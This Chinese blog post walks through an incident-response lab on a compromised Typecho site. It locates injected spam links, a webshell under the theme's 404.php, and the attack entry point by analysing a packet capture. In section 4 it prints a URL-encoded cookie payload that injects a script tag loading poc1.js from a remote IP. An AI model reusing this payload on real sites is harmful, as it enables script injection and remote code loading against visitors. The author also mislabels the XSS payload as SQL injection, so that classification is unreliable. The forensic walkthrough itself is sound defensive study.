第五章 linux实战-黑链

fasewer2024-09-30 20:09

finalshell通过ssh连接linux机器

1.找到黑链添加在哪个文件 flag 格式 flag{xxx.xxx}

执行查找命令

复制代码 
grep -rnw '/var/www/html/' -e '黑链'
代码分析
复制代码 
以下是对"grep -rnw '/var/www/html/' -e '黑链'"这段代码的分析:

一、整体功能

这段代码使用 grep 命令在指定的目录 /var/www/html/ 中搜索包含特定字符串"黑链"的内容。

二、参数解释

• -r:递归搜索,即对指定目录及其子目录中的所有文件进行搜索。

• -n:在输出结果中显示匹配行的行号。

• -w:只匹配整个单词,确保搜索的"黑链"不是其他单词的一部分。

• /var/www/html/:指定要搜索的目录路径。

• -e '黑链':指定要搜索的模式为"黑链"。

三、用途

主要用于查找可能存在的恶意黑链。在网站安全检查中,如果在 /var/www/html/ 目录下的网页文件中发现了"黑链"字样,可能意味着网站被黑客入侵并植入了非法链接,以便及时采取措施进行清理和修复,保障网站的安全和正常运行。

flag

复制代码 
flag{header.php}

2.webshell的绝对路径 flag{xxxx/xxx/xxx/xxx/}

下载html文件夹

使用D盾查杀

找到webshell后门文件特征($_POST)

flag

复制代码 
flag{/var/www/html/usr/themes/default/404.php}

3.黑客注入黑链文件的 md5 md5sum file flag{md5}

打开可疑文件所在位置

发现黑链文件

执行MD5编码命令

复制代码 
 certutil -hashfile .\poc1.js MD5
代码分析
复制代码 
以下是对"certutil -hashfile.\poc1.js MD5"这段代码的分析:

一、整体功能

这段代码使用 certutil 命令来计算指定文件(这里是当前目录下的"poc1.js"文件)的 MD5 哈希值。

二、参数解释

• -hashfile:表示对指定文件进行哈希计算。

• .\poc1.js:指定要计算哈希值的文件路径,这里是当前目录下的"poc1.js"文件。

• MD5:指定要计算的哈希算法为 MD5。

三、用途

1. 完整性校验:可以用于验证文件在传输或存储过程中是否被篡改。如果文件的 MD5 哈希值与预期的哈希值不同,那么文件很可能已经被修改。

2. 识别重复文件:不同的文件通常具有不同的 MD5 哈希值,所以可以通过比较文件的 MD5 哈希值来判断两个文件是否相同。

3. 安全检查:在某些安全场景下,通过计算文件的哈希值可以帮助检测恶意软件或非法修改的文件。

flag

复制代码 
flag{10c18029294fdec7b6ddab76d9367c14}

4.攻击入口是哪里?url请求路径,最后面加/ flag{/xxxx.xxx/xxxx/x/}

wireshark分析pacp文件

执行查找命令

复制代码 
http contains "poc1.js"
代码分析
复制代码 
以下是对"http contains "poc1.js""的分析:

一、整体含义

这可能是一个用于分析 HTTP 流量的过滤条件或搜索表达式。

二、具体解释

"http"通常代表与 HTTP 协议相关的内容,在这里可能指的是 HTTP 请求、响应或者是 HTTP 通信的日志等。"contains"表示包含的意思,后面的""poc1.js""是一个特定的字符串。

三、用途场景

1. 网络安全分析:在网络流量监测中,使用这个表达式可以快速筛选出包含特定文件名"poc1.js"的 HTTP 通信。这可能有助于检测潜在的恶意软件传播或异常的文件访问行为。例如,如果发现大量不明来源的 HTTP 请求中包含"poc1.js",可能暗示着有针对性的攻击活动。

2. 故障排查:在排查网络应用故障时,如果知道某个特定的脚本文件"poc1.js"可能与问题相关,通过这个表达式可以在大量的 HTTP 日志中快速定位到与该文件有关的通信记录,以便进一步分析问题的根源。

3. 性能优化:对于大型的网络应用,分析 HTTP 流量中特定文件的请求情况可以帮助优化资源加载策略。如果发现"poc1.js"文件的请求频率很高或者响应时间较长,可以考虑对该文件进行优化,如压缩、缓存或者优化服务器配置以提高响应速度。

找到可疑cookie,根据关键词得知这是SQL注入

对该cookie进行url解码

复制代码 
https://www.sojson.com/encodeurl.html
09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc1.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23

确定flag为

flag

复制代码 
flag{/index.php/archives/1/}
相关推荐
轻松Ai享生活2 小时前
5 节课深入学习Linux Cgroups
linux
christine-rr3 小时前
linux常用命令(4)——压缩命令
linux·服务器·redis
三坛海会大神5553 小时前
LVS与Keepalived详解(二)LVS负载均衡实现实操
linux·负载均衡·lvs
東雪蓮☆3 小时前
深入理解 LVS-DR 模式与 Keepalived 高可用集群
linux·运维·服务器·lvs
qq_264220893 小时前
LVS负载均衡群集和LVS+Keepalived群集
运维·负载均衡·lvs
乌萨奇也要立志学C++4 小时前
【Linux】进程概念(二):进程查看与 fork 初探
linux·运维·服务器
雨落Liy4 小时前
Nginx 从入门到进阶:反向代理、负载均衡与高性能实战指南
运维·nginx·负载均衡
Yyyy4824 小时前
Nginx负载均衡集群实验步骤
运维·nginx·负载均衡
绿箭柠檬茶5 小时前
Ubuntu 服务器配置转发网络访问
服务器·网络·ubuntu
獭.獭.5 小时前
Linux -- 信号【上】
linux·运维·服务器
热门推荐
01GitHub 镜像站点02UV 工具安装与国内镜像源配置指南03UV安装并设置国内源0446个Nano-banana 精选提示词,持续更新中05A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程06KGG转MP3工具|非KGM文件|解密音频07解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题08conda中设置镜像地址(附所有可换的地址)09Claude Code 平替:OpenAI发布 Codex CLI ,GPT-5 国内直接使用10保姆级教程:手把手教你用Dify实现完美多轮对话(附Chatflow和提示词)